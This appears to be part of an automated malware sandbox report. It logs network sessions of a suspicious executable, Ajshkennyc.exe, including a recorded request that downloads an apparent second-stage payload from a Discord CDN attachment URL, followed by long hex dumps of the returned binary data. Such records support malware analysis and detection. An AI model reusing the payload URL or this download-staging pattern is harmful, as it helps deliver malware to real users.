ed 33 8b 28 e8 22 3e b9 a1 2f d9 8c
              Data Ascii: rhMd+2?r/`Hr@\3Y:gxo<r|y%VA0+c3y ^Heb -KFMmNi4ACCp%CCpH"+\3YW#}{|}.U%c=X*}C8a 3(">/
              2022-01-14 10:26:09 UTC743INData Raw: 79 b1 7b 8c 5e bd c2 15 16 fa f2 85 85 46 0f 7c ba 81 4d 9a ee fc 96 b4 94 8d 25 b1 38 c2 61 7e fa d4 39 25 b1 34 24 48 ff d6 aa 37 ea 6e 5b d2 e0 55 29 0a b8 74 24 a6 a3 51 a0 49 e9 c8 7f 8a d1 b6 fb 3d da 5f 45 41 f3 47 8c e9 dd 29 c1 d2 a5 17 97 72 6e 2f 82 02 7b 8c 5e bd c2 15 16 fa 18 98 33 11 0d 04 70 82 03 e1 2c 4c 58 e2 d7 81 fc 1d d9 43 35 6d 35 de 1b 74 78 55 d0 bd c2 1d 0c de da 02 a0 06 b9 4d 5e f4 48 cb 65 0b cc e7 2b 8b d7 08 b5 b4 35 65 03 6d 91 29 42 d5 b0 f8 72 ad 54 67 c5 e8 a9 db 85 0e 87 70 65 c2 9e 8d 2c bc c8 a6 9f 56 cc 91 26 bc 08 1b e6 60 b7 35 65 2b c4 52 d1 7a ba c8 ef 35 91 e5 2f 9c 0d fb ec 89 94 46 cf 7e b3 b8 33 95 fe 56 ea a2 0d 59 a4 5a 6e 91 22 b7 9c 00 68 46 03 ee 96 35 dd ae 69 e7 05 72 ae 62 90 95 32 96 b4 f6 6a d3 6a
              Data Ascii: y{^F|M%8a~9%4$H7n[U)t$QI=_EAG)rn/{^3p,LXC5m5txUM^He+5em)BrTgpe,V&`5e+Rz5/F~3VYZn"hF5irb2jj
              2022-01-14 10:26:09 UTC759INData Raw: d3 9b c3 14 d5 bf 8f 4a 72 71 1d ff 97 fb 98 f9 c9 2e 88 b5 5c 7f 88 dd 1f a7 15 e1 97 bb ce 67 b8 3f f6 c0 e6 20 bf 80 84 c1 82 88 67 73 ab 72 6b 27 3e f1 5e 26 b9 0a 36 70 25 2a ca 9c 9c 48 b4 83 83 4e a3 2c 40 27 4b 80 32 d9 38 7b b5 f3 c2 9e 84 13 57 21 f3 09 64 00 e3 ca 53 5d 8d 8f 79 7d 3e d2 a6 92 20 31 11 86 d4 a2 8b 92 ad ec ed b1 f9 09 70 c7 f5 8d 20 ae e9 ac 42 bf 48 45 6b 6a 27 b7 39 60 48 47 83 fc d5 ca e6 5e 07 16 1b 24 5e f9 f0 84 72 a4 53 12 ce 39 ed a2 b9 be f4 07 08 86 6e 9b bf 02 2d c3 7c 7a 76 6d d8 f8 cc b8 14 94 af 6b d4 83 4b 4d 19 ce 45 8e 13 1d d8 81 8e e3 79 b9 0a 68 3a 28 45 80 83 65 f8 98 47 22 ce bb c2 d3 30 9b 98 fd 91 2f db 6a 1f a1 04 d7 81 8c 59 f8 00 20 a8 57 59 e8 66 05 0c 7d 00 b2 ff 91 61 41 87 ee 96 81 88 d9 08 fc 51
              Data Ascii: Jrq.\g? gsrk'>^&6p%*HN,@'K28{W!dS]y}> 1p BHEkj'9`HG^$^rS9n-|zvmkKMEyh:(EeG"0/jY WYf}aAQ
              2022-01-14 10:26:09 UTC770INData Raw: b3 5a 5d c2 65 a1 29 30 fc 96 df b6 94 c3 c8 53 ea 1a d3 da 3e 82 d8 23 43 15 62 20 c0 4e 4b 8e d1 db 92 c0 65 b4 9d 2b 24 e8 36 80 83 55 fb 60 5b d0 58 4c 4f e5 86 f4 e5 8c f2 df 8a 99 65 98 d6 2d 22 c0 63 a6 a1 13 77 88 f4 e9 85 51 e9 83 60 5d db 92 f4 84 fc fb 70 0e f5 72 17 45 f0 16 f1 a2 91 29 2f 22 d6 36 ab 0b 6e 32 89 17 45 df b0 9e a4 b1 2f 35 3a 89 7a 1f 73 b9 af 19 6b a5 33 3c 9e eb f0 10 e8 08 1b 4f fb 72 07 a8 a8 b5 16 f1 a2 bd e6 11 52 73 9f 2c 96 eb f0 18 f3 77 89 48 65 a8 b5 27 61 e1 aa 8d 49 d6 1d 28 a5 36 ad 08 1f 73 88 ec 16 eb 84 e0 2c a0 a4 ba 5b c6 79 9a d4 50 19 72 16 fd 6c 23 5c 5d df 8a c6 6e 36 b6 a4 8c 9e bc 7a 13 67 9d 2f 31 21 45 f2 e9 ba 5b c1 fe f3 5d e9 ec 00 0d 70 0e f2 ef ba 61 dd bf ee 1a d3 d4 5b c3 f2 d0 4d e0 3d 1a f0
              Data Ascii: Z]e)0S>#Cb NKe+$6U`[XLOe-"cwQ`]prE)/"6n2E/5:zsk3<OrRs,wHe'aI(6s,[yPrl#\]n6zg/1!E[]pa[M=
              2022-01-14 10:26:09 UTC786INData Raw: a4 d3 bd 8a 99 32 36 df d5 bf 8f 57 db af 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 45 80 82 84 8c 9e c5 9e c5 9c c1 b3 74 68 4e 75 9f 29 26 92 ab 62 41 78 71 e2 5c 33 59 ad 67 cc 2b 47 85 0e 87 10 8a 9a bd 8a 99 3b 6a 52 08 c9 a5 55 a4 a7 21 54 56 08 79 f6 88 b5 78 70 60 3c f9 bf 8f 50 7c 09 9e b7 0d 62 41 78 71 e2 5c 33 59 ad 67 cc 2b 47 85 0e 87 13 12 8f 25 38 e4 41 78 70 60 3c f9 bf fb 76 1e cf c0 61 d8 19 1f 2c c9 a5 55 a4 d3 bb e5 cd 9e f4 f4 e2 03 ba 56 65 c6 79 f4 84 73 18 9d 43 7d 17 1a a1 4c 75 87 7a 10 a5 55 a4 d3 bb 86 90 a6 d7 c4 1a a1 4c 10 8b 1b 23 35 4c 11 0e 87 13 12 8c 9e c5 98 a8 dc 4f 95 6d d9 c8 23 35 5d b6 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 95 32 d6 25 3b 69 d0 34 db c2 15 16 97 ee 77 ef fb 5b b1 70 60 3c ec 72 64 45 80 83
              Data Ascii: 26WE~n[p`<rdEthNu)&bAxq\3Yg+G;jRU!TVyxp`<P|bAxq\3Yg+G%8Axp`<va,UVeysC}LuzUL#5LOm#5]$}2%;i4w[p`<rdE
              2022-01-14 10:26:09 UTC802INData Raw: 1b 23 34 db cd ae e9 ec 72 64 df d5 bf 8f 24 b7 7d fc fe 05 aa e1 29 42 fe 9a bd 8a 99 3a e8 69 b8 ff 1c a6 d7 c4 1a a1 0a 27 3e f0 7b f8 8d 20 ae e9 ec 34 db cd ae e9 ec 72 64 45 80 83 0a 7e 7f 01 ea 6e 5b b1 70 60 3c ec 72 64 da 12 8e 51 9b 3b 6a 52 1d 28 c0 11 0c 24 b7 7d fc 96 b4 f6 89 5c 6b d5 be 0c 82 87 13 12 8f 25 71 e2 5c 33 59 ad 67 cd 99 a5 0d 05 00 68 4a 0b 00 68 4e 14 94 ae de 53 9f 48 07 f7 0b 01 f2 d8 46 02 6c 57 a8 dc 4f 97 37 79 f4 84 8c 9e c5 9c c1 68 d1 ee 76 9e c5 98 b8 ff 1c a6 d7 c4 1a 5a 2f 50 19 1f 2c c9 a5 8c c6 1e ab 62 41 78 71 e2 5c 33 80 83 0a 7e 7f 01 ea 6e e7 78 29 43 8f 24 b3 74 68 4e 14 94 af 6b 69 d0 34 db cd ae e9 ec e8 31 54 23 35 5d b6 fb 13 12 8f be 0c 82 87 13 12 8f 24 df 4a 53 9e 36 df d1 b6 fb 13 12 8f 24 b7 15 16
              Data Ascii: #4rd$})B:i'>{ 4rdE~n[p`<rdQ;jR($}\k%q\3YghJhNSHFlWO7yhvZ/P,bAxq\3~nx)C$thNki41T#5]$JS6$
              2022-01-14 10:26:09 UTC818INData Raw: 5a 28 d2 38 f5 1f 0b 0b 3b 61 84 84 8f 3d 50 19 31 56 26 bc 1f 3c eb e2 5d a7 51 98 b3 67 c4 3f 72 75 ea 6e 5b b1 78 72 6f e3 d5 b4 f6 ac e6 65 c7 b8 fd 01 d5 ac ac ee 4c 1b 19 17 19 1f 18 9f 48 07 e0 48 0f 0a 75 f8 85 2b 46 12 8e a2 ce 30 cb 95 21 78 68 69 db f6 83 30 da 49 90 99 3b 44 d3 bb 86 83 43 7c 7f 2d 4b 8e b1 71 fb 2f 43 35 44 d9 c3 ac ee 4d 9a be 15 29 43 52 36 df d5 a6 eb e9 d3 a8 95 39 5d bd b0 e5 e0 58 1e 80 83 0a 69 d2 2a 8c 95 09 f0 41 70 63 c3 a3 78 71 e2 44 fc 85 47 8e 99 31 6e 55 a7 59 99 12 8f 24 bc 51 90 fe 8d 75 ea 3c ff 2d 4a 16 bf 8f 24 a4 9a bd ac c3 97 36 cc 2a d6 73 e7 f6 89 16 1a 28 e5 e3 de 4b cc ba 1c a4 d3 ba 86 1a 85 0e 87 00 59 ac f4 85 0f 8b 92 88 95 32 c1 c6 1f 27 1c a6 d7 d7 f5 06 70 41 78 71 f1 fc 9d 1a aa b8 e8 3c ed
              Data Ascii: Z(8;a=P1V&<]Qg?run[xroeLHHu+F0!xhi0I;DC|-Kq/C5DM)CR69]Xi*ApcxqDG1nUY$Qu<-J$6*s(KY2'pAxq<
              2022-01-14 10:26:09 UTC834INData Raw: 24 b6 9d 56 94 aa e0 3b 03 89 76 00 37 04 7a 76 6d da ce 25 8b 1e ea 6e 09 be 48 46 46 4b d1 e5 ac a1 13 57 ef b8 b2 bb d9 c1 93 2a c5 9c c0 06 7d fc 96 b6 d4 3d 6f dc 15 11 0d 61 d2 5b c4 75 8f 04 17 74 07 9b 3b 7a 74 68 2b 2b 25 4f f8 e9 e8 61 bc 08 79 f4 37 60 d8 43 7c 3d 21 7e 33 1e e4 2e 81 50 1f 2c c9 a5 ae e8 71 e7 e7 a0 84 c3 db cb a9 5e 39 a3 ee 73 e6 37 35 0d 5b f5 54 6d 8e e6 66 49 89 17 a9 6f d9 c8 71 b6 ab 3d 28 8e ed b8 aa e3 de 27 50 70 40 81 77 80 eb 83 0f 0b 02 6c 25 5b d9 ab 42 9e a0 a4 b4 9f 3b 6c 56 24 b7 7d fd 51 02 6f dd 95 7b b7 2b 17 56 25 3a e8 68 14 9c c4 1a a1 4d 07 67 cf b2 b7 29 1b 61 ee 74 68 3a 89 78 1d 4e 10 8f 26 bc 08 78 52 90 a5 55 e0 0a 31 03 aa e3 de 53 9f 96 38 e7 e7 a3 03 a1 1b 20 ae e9 ed cc a0 c9 a5 10 df 8c dc 4c
              Data Ascii: $V;v7zvm%nHFFKW*}=oa[ut;zth++%Oay7`C|=!~3.P,q^9s75[TmfIoq=('Pp@wl%[B;lV$}Qo{+V%:hMg)ath:xN&xRU1S8 L
              2022-01-14 10:26:09 UTC850INData Raw: dc 3d 1c 89 61 db a9 2d 38 8b 69 b3 5b 8b 58 2b 47 bc 31 21 5f dd ec 16 ec 01 c7 80 b1 3f 5e 18 fa bc 28 f4 b2 df e3 e6 1d 15 7e 1c d4 5c 5e 15 36 bc 61 cc 4e 7a 13 75 d6 27 50 6c 23 58 07 d7 f0 4d ff 31 74 5a 01 d3 95 06 55 e7 c7 f5 48 40 f4 8c 9e c5 9b 40 f5 02 6c 57 ad c3 97 36 df d4 75 4e 15 16 ec 1c d3 d4 7e 11 62 28 b4 95 57 fb 67 a9 19 40 82 e0 36 b6 96 eb af 5d b6 fb 13 13 63 fb 13 12 8d 22 8b 1b 23 34 78 49 89 17 0b a1 4c 10 8a 3a e8 10 fb 70 0d 61 d3 87 13 12 8e 71 45 81 05 96 c7 c1 d1 d3 dc 2e a0 83 4f c7 d4 58 6d 86 a6 d7 c4 1a a0 3e c9 a5 55 b5 12 8f 24 b3 e7 41 79 f4 f7 78 14 e6 01 8e e3 ac 8a df bb e9 85 7a 15 73 b5 0c e7 a0 95 45 e7 89 7e 12 d0 6b ee 76 2d 40 f5 72 16 f7 69 b1 4a 0b 00 68 4e cd 96 b4 f6 83 0f 31 54 22 a3 9e fd 18 9d 52 2f
              Data Ascii: =a-8i[X+G1!_?^(~\^6aNzu'Pl#XM1tZUH@@lW6uN~b(Wg@6]c"#4xIL:paqE.OXm>U$AyxzsE~kv-@riJhN1T"R/
              2022-01-14 10:26:09 UTC866INData Raw: 8f 24 b7 e8 57 a8 dc 4f 97 36 df 40 c1 93 2d 4b 8e a2 ce a5 79 f4 84 8c 9e c5 9c 54 00 68 4e 14 94 af 6b 40 ed f4 84 8c 9e c5 9c 54 32 d6 42 fa 91 29 42 6f d9 c8 23 35 5d b6 fb 87 e5 e3 de 53 9f 48 07 63 2b 47 85 0e 87 13 12 1b f9 0f 09 fb 13 12 8f 24 b7 7d fc 96 b4 f6 88 01 3a e8 69 d0 34 db cd 3a 28 c0 11 0d 04 70 60 a8 72 64 45 80 83 0a 7e eb 62 41 78 71 e2 5c 33 cd 2a c5 9c c1 93 2d 4b 1a d1 b6 fb 13 12 8f 24 23 5d b6 fb 13 12 8f 24 23 7f 01 ea 6e 5b b1 70 f4 b2 f2 80 83 0a 7e 7f 95 2e cd ae e9 ec 72 64 d1 be 0c 82 87 13 12 8f b7 8f 24 b7 7d fc 96 b4 65 1f 2c c9 a5 55 a4 d3 28 00 68 4e 14 94 af 6b 46 a7 59 ad 67 cc 2b 47 16 0c 82 87 13 12 8f 24 24 cd ae e9 ec 72 64 45 13 78 71 e2 5c 33 59 ad f4 d0 34 db cd ae e9 ec e1 e4 61 be 0c 82 87 13 81 2f 50 19
              Data Ascii: $WO6@-KyThNk@T2B)Bo#5]SHc+G$}:i4:(p`rdE~bAxq\3*-K$#]$#n[p~.rd$}e,U(hNkFYg+G$$rdExq\3Y4a/P
              2022-01-14 10:26:09 UTC882INData Raw: e1 57 57 56 eb 8d c8 23 35 5d b1 ca d8 b9 7c 8a 1c 2b 47 c4 68 d4 55 b4 7f 65 9e 9c 9b ff 2f af 95 dc c9 4d 92 c1 6c a9 ae ec 9a bd cb fc 82 ef f1 97 76 07 a7 59 e9 65 db 6c a8 23 d9 81 ed f4 c5 ee b7 c5 9c 80 f1 15 ac e5 a7 d0 14 2d b4 08 89 3a 00 68 0f 5c 27 56 2e a7 19 75 bb 86 d4 b4 ea cf 4d 6d 35 2c 21 31 15 64 85 b6 fb 52 6f 0d be 0c c6 97 2e 74 97 c8 d3 ee 9f 48 46 56 32 be 04 1a e1 b0 bd 8a dd 58 36 7e 80 7c 96 2d a3 51 da 38 24 0f 09 ba 76 c5 26 bc 4c 99 22 0a 81 fb e3 a3 b9 81 44 ab 76 05 fb 79 b4 9c 91 29 06 fc b2 53 60 c3 7b 39 8e a2 8f 56 e6 dd d1 f7 7d e8 d3 bb c2 9c e5 5a d0 ca d7 61 56 26 fd 4d 86 f8 85 64 05 99 6a 52 59 24 93 8c 61 41 94 46 eb f0 3a 9a 7d 44 fe db be 6c ed f4 c0 98 9c 78 8e 5c c3 5a c7 a0 8b 4e 00 00 60 56 66 23 65 c7 e4
              Data Ascii: WWV#5]|+GhUe/MlvYel#-:h\'V.uMm5,!1dRo.tHFV2X6~|-Q8$v&L"Dvy)S`{9V}ZaV&MdjRY$aAF:}Dlx\ZN`Vf#e
              2022-01-14 10:26:09 UTC898INData Raw: be f0 2e 40 cd 45 7f fe 67 3d 87 d0 bf 99 b1 b9 82 7b b5 f3 fd e7 f1 ca cf 4e 41 f3 c4 91 d6 bd 74 61 56 e5 68 4e 14 94 ab db 31 01 67 90 4d b9 f5 04 5c 35 29 50 35 5d b6 fb 85 e6 a6 5c cf f7 82 47 b6 8c 75 14 6b c0 7d 14 52 96 40 a0 41 87 ec 8d 2e 25 f9 84 78 24 3a fe ef ff 30 d6 36 d9 e4 9e 3a 16 a4 3b a9 d5 9f c1 f7 3b 95 56 26 fd 2a 7e 17 4f 57 9b e7 6c a5 de 05 a0 ca 4d 92 c1 93 47 69 5b e4 a1 c7 63 9e 9c 98 e3 80 73 0d fb ec 75 a9 b7 be f3 fd 0c f2 68 b6 be 81 05 b2 c3 4b e6 75 62 25 63 9a e7 27 0d fb ec 8c 0b e8 aa 6b 29 0f 82 91 a2 31 ab 71 1f c4 e6 30 59 6b 5e c7 5f 44 a9 b6 fe 71 1d d7 3a 5a c7 63 48 07 f7 0b 04 c9 59 f8 00 7e 94 50 e6 9b fc 7e bc 83 0a 7e 7f 00 d1 4a 5e b5 5a c4 09 8f 22 9f 4e 60 3a c4 1a a1 4d c2 fd db 46 ff 59 24 77 dc 1c 4d
              Data Ascii: .@Eg={NAtaVhN1gM\5)P5]\Guk}R@A.%x$:06:;;V&*~OWlMGi[csuhKub%c'k)1q0Yk^_Dq:ZcHY~P~~J^Z"N`:MFY$wM
              2022-01-14 10:26:09 UTC914INData Raw: e1 33 a6 28 8d 8d c8 e5 68 f2 d5 34 24 48 86 6b 3d 6f 56 2e 8e 29 fe cf 3f 73 e6 64 ef 10 74 97 7b 31 bc ce bb 46 56 ad 98 47 07 e0 b0 ed 4b 81 0d 47 0e 47 d0 b9 81 45 73 74 68 0e 74 1d 28 80 70 38 e4 21 c2 2e cd ee 84 92 ab 22 40 49 89 57 5b 0d 04 30 21 8d 20 ee 84 22 b3 34 28 c1 93 6d 2a 79 f4 c4 e9 50 19 5f 48 f7 0b 40 07 26 bc 48 f5 b4 f6 c8 d1 39 66 09 09 97 36 9f ba 54 22 f3 f0 48 07 b7 8e 1e aa a0 39 da 4a 4b 7f de d6 66 b6 fb 13 13 f6 0f 06 61 46 80 7c 85 b1 8f 01 2a 72 6b d5 bf 8d 2b c3 98 f8 49 7f 01 ea 6c 6b 3c 13 ed ba 5f 52 db 46 c7 f5 8d df 2a 39 e3 36 1c 2d 8f 71 6f dd d1 b4 a3 b8 00 97 78 05 1b 2b 14 1f ea e5 cb 42 eb 84 46 fc f0 7c 0e 86 90 4c 91 4f 47 0e 87 13 10 ff f5 f9 f0 35 ce d8 80 08 b1 25 b1 8f db 36 2e 25 f9 84 44 ab ef f9 0f 0b
              Data Ascii: 3(h4$Hk=oV.)?sdt{1FVGKGGEstht(p8!."@IW[0! "4(m*yP_H@&H9f6T"H9JKfaF|*rk+Ilk<_RF*96-qox+BF|LOG5%6.%D
              2022-01-14 10:26:09 UTC930INData Raw: c9 5a d0 cb c1 7b b2 24 3c 13 ed 66 69 38 27 b5 77 9b 3f 73 a2 49 c1 ae 69 10 b8 27 b5 8a 12 d9 9b 3f 33 d4 fe c4 45 42 71 e3 6c 55 d7 c4 5b 30 ca 22 10 84 8c 9e c5 63 e6 5d b2 78 62 aa e2 ee 73 93 e4 e4 20 50 d0 b7 34 de 2a 45 80 83 0b e1 5b 7f 2a 0a f5 ef 8b 1b 62 c0 09 f6 2b 48 07 f7 0b ff fd 99 0a 72 ee 65 bb 70 e5 ad 66 a2 80 74 e3 96 5f bb 34 97 45 80 c2 94 b7 78 d2 36 df d5 bf 70 45 80 09 ef 8c 61 3b 0a 0a 7e 47 b9 01 8c ea ae 6c 85 3d 95 b9 d6 14 54 a9 9d 43 7c 7a e2 98 39 99 c5 0c eb 18 9d 43 7c fa 28 d4 19 4b 03 ee 36 5f 5a 97 36 9e 45 5c 90 aa c4 5e b3 7d 17 1a e0 d8 9a 1e aa e0 a7 a6 f2 8c ba 40 7e 6f a8 dd d1 f7 8b cb 94 2c c9 e4 e1 02 cf ba 20 ea e5 e3 9f c8 f7 a8 d8 62 05 78 71 a3 d1 66 ea 7e 5b f5 8d 70 14 54 a7 a6 28 70 5d 5e 6c 57 a8 dc
              Data Ascii: Z{$<fi8'w?sIi'?3EBqlU[0"c]xbs P4*E[*b+Hrepft_4Ex6pEa;~Gl=TC|z9C|(K6_Z6E\^}@~o, bxqf~[pT(p]^lW
              2022-01-14 10:26:09 UTC946INData Raw: 18 c7 f9 d0 41 a3 d4 76 69 f4 c0 ee 53 9b c0 13 9a b9 a5 01 61 9e e9 ee 00 12 b3 72 16 f9 33 59 27 1a a5 de 72 10 50 9c c5 b8 bb 0f 0e 0c a6 e3 57 57 57 7b 80 6b 06 fe 5d 3d b7 f6 77 10 5b e2 b4 30 59 5d 3d 95 b9 79 30 51 cc 7d af 6b 95 bf 4c 4b d0 f2 0b ff e3 62 05 1b f0 f0 b2 c1 55 2f a0 41 87 ec c5 01 02 af e0 80 08 2f 03 2e 46 c0 4a 55 fb ec 8d e7 b9 69 d0 34 e3 41 90 a6 97 5a 0b a1 4d 20 65 4c 47 d3 63 48 f5 8d d9 43 2b 11 5e 38 e0 9a e0 03 fd 91 4f 96 3d 09 f3 5f 31 a7 ae 8f 34 31 95 f0 f2 53 16 cb 45 0b 55 a4 93 a0 b8 9a c7 c9 cb c6 6c 3f 10 e5 9a ee 12 fb 7a 04 27 5b c7 c9 d6 37 0d 67 b4 b3 10 ea 0b 52 74 1c ca 52 50 4d b6 fb 53 20 6a 52 5d 85 e6 65 87 4b 8a 99 7a 40 a1 4c 50 2f 30 d2 79 a3 a5 55 e4 36 37 61 fe ac a9 5e 78 60 3c ec 72 64 75 eb b0
              Data Ascii: AviSar3Y'rPWWW{k]=w[0Y]=y0Q}kLKbU/A/.FJUi4AZM eLGcHC+^8O=_141SEUl?z'[7gRtRPMS jR]eKz@LP/0yU67a^x`<rdu
              2022-01-14 10:26:09 UTC962INData Raw: b7 dc bf 29 18 0f 97 bd b1 2d 8e 9f 15 f3 51 76 df 6d ec 49 b0 7e d8 a2 83 42 33 2f 25 bc 89 62 4d 85 48 a4 30 cb 09 55 02 62 d0 f3 44 c7 18 a3 89 cb ae 7c d8 24 f2 4f 02 16 d2 d8 ad 90 55 70 25 5e ca ad fb 14 7d 4c 8c c7 e4 9b fb d6 a1 5c 9d bb 2c de 17 8a 06 d1 91 29 99 aa ea bc 4c 36 5e bc 27 17 e8 a5 b6 8d 63 78 a3 77 13 0b 5c 59 82 0b 43 2d e1 a4 38 1f b1 89 c9 2b 05 14 1e f8 1b dc ac d9 01 da 08 05 13 62 b6 76 54 05 a6 bc 4a 19 a9 48 a6 fc e9 0a 69 7a 37 c9 36 65 80 4a 8b f2 0c 62 00 55 4b 3d c4 0c 47 1e be af 2b 94 6d a1 53 d6 bd 45 26 69 90 cf 2f 95 9f e0 73 96 01 74 28 a5 a9 31 28 80 c6 9f 6a c4 5a 4d 5b 43 b5 b5 7c 1d 66 96 f4 db 6c d8 41 af 5d 0f 02 89 57 f4 05 cc 12 f7 f3 96 bd 0e c7 f8 43 b7 f2 a7 ad 47 8a a3 11 58 8f 4b 2b fe 0a 67 69 18 dd
              Data Ascii: )-QvmI~B3/%bMH0UbD|$OUp%^}L\,)L6^'cxw\YC-8+bvTJHiz76eJbUK=G+mSE&i/st(1(jZM[C|flA]WCGXK+gi


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.449779162.159.134.233443C:\Users\user\Contacts\Ajshkennyc.exe
              TimestampkBytes transferredDirectionData
              2022-01-14 10:26:21 UTC972OUTGET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1
              User-Agent: 60
              Host: cdn.discordapp.com
              Cache-Control: no-cache
              2022-01-14 10:26:21 UTC972INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 10:26:21 GMT
              Content-Type: application/octet-stream
              Content-Length: 466432
              Connection: close
              CF-Ray: 6cd62a62c9985c56-FRA
              Accept-Ranges: bytes
              Age: 7948
              Cache-Control: public, max-age=31536000
              Content-Disposition: attachment;%20filename=Ajshkennychvrlvyqvxklxbhfqfzgvr
              ETag: "160f746c3471a01d756cd5438ae7899d"
              Expires: Sat, 14 Jan 2023 10:26:21 GMT
              Last-Modified: Fri, 14 Jan 2022 06:28:55 GMT
              Vary: Accept-Encoding
              CF-Cache-Status: HIT
              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              x-goog-generation: 1642141735792380
              x-goog-hash: crc32c=BMufiQ==
              x-goog-hash: md5=Fg90bDRxoB11bNVDiueJnQ==
              x-goog-metageneration: 1
              x-goog-storage-class: STANDARD
              x-goog-stored-content-encoding: identity
              x-goog-stored-content-length: 466432
              X-GUploader-UploadID: ADPycdvgVw86lNODc_FUvxJ5vBPBPwu7yWNJ-fM7Bf9Y4Jwa0j518QQwomxRFtc2-ZlqlgwH5n6LpEXFuy97oIiXV5o
              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
              2022-01-14 10:26:21 UTC973INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 68 5a 55 38 46 4a 7a 6d 45 77 7a 77 46 4e 6f 31 53 48 4a 79 6d 6f 51 57 51 4c 34 7a 63 51 54 30 54 70 33 4b 64 62 68 51 57 70 59 74 6d 25 32 46 38 53 68 25 32 46 77 6d 36 69 6f 39 4b 41 37 78 6f 65 41 73 6f 4a 5a 6f 6a 4d 50 70 25 32 42 6e 49 5a 33 41 32 59 68 4d 43 41 62 70 54 6c 74 37 35 73 39 58 64 43 6b 25 32 42 6a 76 53 43 4e 39 6a 49 68 30 75 68 48 5a 6a 6d 71 7a 56 69 34 25 32 46 25 32 42 63 4a 33 4c 25 32 46 44 25 32 42 41 76 77 63 62 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c
              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hZU8FJzmEwzwFNo1SHJymoQWQL4zcQT0Tp3KdbhQWpYtm%2F8Sh%2Fwm6io9KA7xoeAsoJZojMPp%2BnIZ3A2YhMCAbpTlt75s9XdCk%2BjvSCN9jIh0uhHZjmqzVi4%2F%2BcJ3L%2FD%2BAvwcbQ%3D%3D"}],"group":"cf-nel",
              2022-01-14 10:26:21 UTC973INData Raw: 18 da 04 39 22 f7 4a 5b f6 c6 57 ec 36 9e 95 6a 0a 39 28 89 53 db 8c ce 77 a1 05 b7 39 27 6e 03 b6 bc 46 4a 4f d3 fa c1 d4 73 af 2f 14 d5 ef a1 14 d3 f5 4f d3 ff 5d e6 22 fd 51 df 91 68 1e f2 d8 01 a4 9a f9 4b cf e2 1b 6d 90 e2 18 dc 1f 74 30 95 7c 33 1d 6c 16 c8 64 0b 49 cd ea 2f 00 30 8a de 1d 61 fa d5 fe ca 60 72 2d 0f 4d d3 eb a8 84 cb e7 ae ad 23 74 38 a3 1f 65 83 4e 55 f4 dc 17 5d f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f1 b3 3d 2b 03 af 3b 32 8e e5 ad 2e 89 53 de 03 a9 10 c2 51 df 94 ff 44 a6 90 e8 20 ea 2a 84 dc 08 37 28 84 c8 62 11 55 fc d1 f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f2 c1 c3 f5 63 a2 a1 1c f4 d7 a2 aa b2 a1 23 67 fc a6 8f 73 bf da 65 93 7e 2d 24 92 9b 0f 7f 53 f0 2b 62 6b b1 1f 78
              Data Ascii: 9"J[W6j9(Sw9'nFJOs/O]"QhKmt0|3ldI/0a`r-M#t8eNU]^|;:%sI~6{=+;2.SQD *7(bU^|;:%sI~6{c#gse~-$S+bkx
              2022-01-14 10:26:21 UTC974INData Raw: 1c 5e d2 c4 e8 8e 43 8c 60 da a7 a7 be ea 87 f2 67 3e 1e 40 12 77 0c 61 50 f2 7a 94 5d 48 fd e5 05 01 0f e7 0c 60 c4 fc 66 b1 99 c2 ec 8f c7 50 f8 6c ab 99 d5 44 03 0d f6 75 15 e9 0f e6 9d a7 a5 a9 bb 67 29 b9 63 21 d5 4f 79 12 61 50 ff e4 93 c7 59 51 7f f9 f1 1f cc db 35 a7 b6 12 66 aa 09 1b c0 fb f2 69 2e 2b ac 04 97 d0 d2 d9 2b a2 3c 16 69 32 3c 12 71 1f c7 58 d0 da b6 09 1b c6 fd e1 3b 8b e0 bd 60 de aa 1e 44 13 fe 63 20 54 c7 4b 61 40 08 85 e0 bc eb 1a 48 fb f1 13 f0 9f ae 09 09 1a 47 6f 33 a0 35 b2 10 77 06 95 d6 a8 37 91 c0 e9 02 8f c9 5d 55 41 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4
              Data Ascii: ^C`g>@waPz]H`fPlDug)c!OyaPYQ5fi.++<i2<qX;`Dc TKa@HGo35w7]UA/faQk:c-Pp}x Hhw`rIr
